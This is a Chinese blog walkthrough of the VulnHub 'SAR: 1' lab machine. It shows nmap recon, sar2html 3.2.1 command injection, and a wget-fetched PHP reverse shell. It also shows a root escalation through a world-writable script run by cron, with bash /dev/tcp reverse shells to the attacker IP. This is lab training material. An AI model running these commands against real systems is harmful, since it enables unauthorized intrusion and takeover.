vulnhub 靶机渗透:SAR: 1

35 篇文章 0 订阅
30 篇文章 1 订阅

SAR: 1

https://www.vulnhub.com/entry/sar-1,425/

nmap 扫描

ip:192.168.54.13

# Nmap 7.93 scan initiated Tue May 16 09:18:11 2023 as: nmap --min-rate 20000 -p- -oN nmap/port 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:18:14 2023 -- 1 IP address (1 host up) scanned in 3.10 seconds



# Nmap 7.93 scan initiated Tue May 16 09:18:32 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.0014s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:18:35 2023 -- 1 IP address (1 host up) scanned in 3.12 seconds




# Nmap 7.93 scan initiated Tue May 16 09:18:45 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.13
Warning: 192.168.54.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.13
Host is up (0.00048s latency).
All 65535 scanned ports on 192.168.54.13 are in ignored states.
Not shown: 65493 open|filtered udp ports (no-response), 42 closed udp ports (port-unreach)
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:19:22 2023 -- 1 IP address (1 host up) scanned in 37.06 seconds




# Nmap 7.93 scan initiated Tue May 16 09:18:52 2023 as: nmap -sV -p80 -oN nmap/services 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:90:14:1A (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 16 09:19:00 2023 -- 1 IP address (1 host up) scanned in 7.74 seconds





# Nmap 7.93 scan initiated Tue May 16 09:19:07 2023 as: nmap -sC -p80 -oN nmap/script 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00025s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:19:13 2023 -- 1 IP address (1 host up) scanned in 5.92 seconds





# Nmap 7.93 scan initiated Tue May 16 09:19:39 2023 as: nmap --script=vuln -p80 -oN nmap/vuln 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00030s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:20:11 2023 -- 1 IP address (1 host up) scanned in 32.31 seconds

80端口web渗透

发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号sar2html Ver 3.2.1
,既然是工具就可能存在漏洞,去searchsploit搜一下。

# yunki @ yunki in ~/vulnhub/sar [9:25:41] C:130
$ searchsploit sar2html
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                         |  Path
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution                                                                          | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                                                              | php/webapps/47204.txt
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

发现了2个且版本都是对应的,试试。

# yunki @ yunki in ~/vulnhub/sar [9:31:26] 
$ searchsploit -m 49344
  Exploit: sar2html 3.2.1 - 'plot' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49344
     Path: /usr/share/exploitdb/exploits/php/webapps/49344.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/vulnhub/sar/49344.py



# yunki @ yunki in ~/vulnhub/sar [9:31:35] 
$ searchsploit -m 47204
  Exploit: Sar2HTML 3.2.1 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/47204
     Path: /usr/share/exploitdb/exploits/php/webapps/47204.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/yunki/vulnhub/sar/47204.txt

先试试第一个。


# yunki @ yunki in ~/vulnhub/sar [9:31:41] 
$ cat 47204.txt                       
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.%

在这里插入图片描述
发现执行成功了,那就说明该漏洞是存在的。用下一个py脚本试试。

# yunki @ yunki in ~/vulnhub/sar [9:31:46] 
$ python3 49344.py
Enter The url => http://192.168.54.13/sar2HTML/
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE

Command => 

发现该脚本相当于一个shell。但是不够好用,那我们写一个反弹shell试试。
kali

# yunki @ yunki in ~/vulnhub/sar [9:41:16] 
$ vim shell.txt                                                                                    

# yunki @ yunki in ~/vulnhub/sar [9:42:02] 
$ cat shell.txt   
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>

# yunki @ yunki in ~/vulnhub/sar [9:42:08] 
$ php -S 0:80          
[Tue May 16 09:42:11 2023] PHP 7.4.15 Development Server (http://0:80) started
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Accepted
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 [200]: (null) /shell.txt
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Closing

靶机

Command => wget http://192.168.54.128/shell.txt -O shell.php

Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
shell.php

开启端口监听,然后打开http://192.168.54.13/shell.php
发现已经反弹shell了。

获得系统立足点

# yunki @ yunki in ~/vulnhub/sar [9:46:21] C:1
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.13] 37552
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ 

提权

www-data@sar:/var/www/html/sar2HTML$ ls -liah
ls -liah
total 164K
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 .
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 ..
405911 -rwxr-xr-x 1 www-data www-data  35K Mar 14  2019 LICENSE
405981 -rwxr-xr-x 1 www-data www-data  53K Mar 19  2019 index.php
405908 -rwxr-xr-x 1 www-data www-data  52K Mar 19  2019 sar2html
426148 drwxr-xr-x 3 www-data www-data 4.0K Oct 20  2019 sarDATA
405912 drwxr-xr-x 3 www-data www-data 4.0K Mar 19  2019 sarFILE
401045 -rw-r--r-- 1 www-data www-data   76 May 16 07:12 shell.php
www-data@sar:/var/www/html/sar2HTML$ cd ..
cd ..
www-data@sar:/var/www/html$ ls
ls
finally.sh
index.html
phpinfo.php
robots.txt
sar2HTML
write.sh

www-data@sar:/var/www/html$ ls  -liah
ls  -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21  2019 ..
408197 -rwxr-xr-x 1 root     root       22 Oct 20  2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data  11K Oct 20  2019 index.html
408195 -rw-r--r-- 1 www-data www-data   21 Oct 20  2019 phpinfo.php
400981 -rw-r--r-- 1 root     root        9 Oct 21  2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data   30 Oct 21  2019 write.sh
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

发现有个root权限执行的定时任务,且5分钟执行一次。

www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh

./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21  2019 ..
408197 -rwxr-xr-x 1 root     root       22 Oct 20  2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data  11K Oct 20  2019 index.html
408195 -rw-r--r-- 1 www-data www-data   21 Oct 20  2019 phpinfo.php
400981 -rw-r--r-- 1 root     root        9 Oct 21  2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data   30 Oct 21  2019 write.sh

可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.54.128/4444 0>&1

然后静静地等待5分钟,就获取了root权限的反弹shell。

结束

root@sar:/var/www/html# whoami 
whoami
root

root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99

root@sar:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:90:14:1a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 293sec preferred_lft 293sec
    inet6 fe80::c3cf:34f9:1c23:4932/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
       
root@sar:~# uname -a
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值